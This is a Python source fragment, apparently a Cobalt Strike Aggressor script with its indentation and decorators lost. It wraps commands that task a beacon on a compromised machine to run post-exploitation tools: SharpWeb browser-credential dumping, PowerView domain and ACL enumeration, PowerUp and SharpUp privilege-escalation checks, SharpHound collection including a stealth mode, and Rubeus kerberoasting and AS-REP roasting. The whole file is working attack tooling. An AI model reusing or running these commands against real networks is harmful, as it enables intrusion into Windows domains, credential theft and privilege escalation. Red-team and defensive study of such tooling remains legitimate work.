def _(bid, out=None):
args = ['all']
# output file
if out:
args += ['-o', out]
external.run(bid, 'sharpweb', args)
def _(bid):
temp = helpers.guess_temp(bid)
# Forests and trusts:
# Get-DomainTrustMapping
# Get-ForestTrust
# Get-DomainTrust
# Parsing GPOs:
# Get-GptTmpl
# Get-GroupsXML
# File shares:
# Get-DomainFileServer
# Get-DomainDFSShare
# Get-DomainManagedSecurityGroup?
# TODO remove subnet and site?
# computer objects don't show up in Get-DomainObject for some reason
command = helpers.code_string(r"""
cd {}
$FormatEnumerationLimit=-1
Get-DomainObject | Format-List -Property * > objects.domain
Get-DomainPolicyData | Format-List -Property * > policy.domain
Get-DomainSite | Format-List -Property * > sites.domain
Get-DomainSubnet | Format-List -Property * > subnets.domain
Get-DomainGPOUserLocalGroupMapping | Format-List -Property * > gpo_localgroups.domain
Get-GPODelegation | Format-List -Property * > gpo_delegations.domain
Get-DomainGPO | %{{Get-ObjectACL -ResolveGUIDs -Name $_.Name}} > gpo_acls.domain
Get-DomainTrustMapping | Format-List -Property * > trusts.domain
Get-DomainManagedSecurityGroup | Format-List -Property * > managers.domain
Invoke-ACLScanner -ResolveGUIDs > interesting_acls.domain
echo "All finished with domain-enum. Run domain-enum-next."
""".format(powershell_quote(temp)))
aggressor.btask(
bid, 'Tasked beacon to enumerate domain objects and info (stage 1/3)')
external.run(bid, 'powerview', command)
def _(bid, *args):
external.run(bid, 'seatbelt', ['user'] + list(args))
def _(bid, *args):
external.run(bid, 'seatbelt', args)
def _(bid, *args):
external.run(bid, 'seatbelt', ['system'] + list(args))
def _(bid, *args):
external.run(bid, 'powerview',
'Invoke-FileFinder {}'.format(' '.join(args)))
def callback(bid, *args, function=function):
external.run(bid, 'powerview', '{} {}'.format(function,
' '.join(args)))
def _(bid):
external.run(bid, 'seatbelt', 'Patches')
def _(bid, *args):
external.run(
bid, 'powerup',
'$FormatEnumerationLimit=-1; Invoke-AllChecks | Format-List' +
' '.join(args))
def _(bid, *args):
external.run(bid, 'seatbelt', ['all', 'full'] + list(args))
def _(bid):
external.run(bid, 'seatbelt', ['BasicOSInfo', 'UserFolders', 'AntiVirusWMI', 'InterestingProcesses'])
def _(bid, *args):
external.run(bid, 'grouper', list(args))
def _(bid):
external.run(bid, 'seatbelt', ['AllTcpConnections', 'AllUdpConnections'])
def _(bid, *args):
external.run(bid, 'sharphound', ['--CollectionMethod', 'All'] + list(args))
def _(bid, *args):
external.run(bid, 'sharphound', ['--Stealth'] + list(args))
def _(bid, *args):
external.run(bid, 'sharphound', list(args))
def _(bid, *args):
external.run(
bid, 'powerview',
'Find-LocalAdminAccess {}; echo "Finished with Find-LocalAdminAccess"'.
format(' '.join(args)))
def _(bid, *args):
external.run(
bid, 'powerview',
'Invoke-ShareFinder -CheckShareAccess {}'.format(' '.join(args)))
def _(bid):
external.run(bid, 'seatbelt', 'MappedDrives')
def _(bid, *args):
external.run(bid, 'rubeus', args)
def _(bid):
external.run(bid, 'seatbelt', ['BasicOSInfo', 'UACSystemPolicies', 'Patches', 'TokenGroupPrivs', 'LocalGroupMembers'])
def _(bid, *args):
external.run(bid, 'rubeus', ['kerberoast'] + args)
def _(bid, *args):
external.run(bid, 'powerup',
'$FormatEnumerationLimit=-1; ' + ' '.join(args))
def _(bid):
external.run(bid, 'rubeus', ['kerberoast'])
external.run(bid, 'rubeus', ['asreproast'])
def _(bid, *args):
external.run(bid, 'sharpup', args)
def _(bid, *args):
external.run(bid, 'powerview', args)
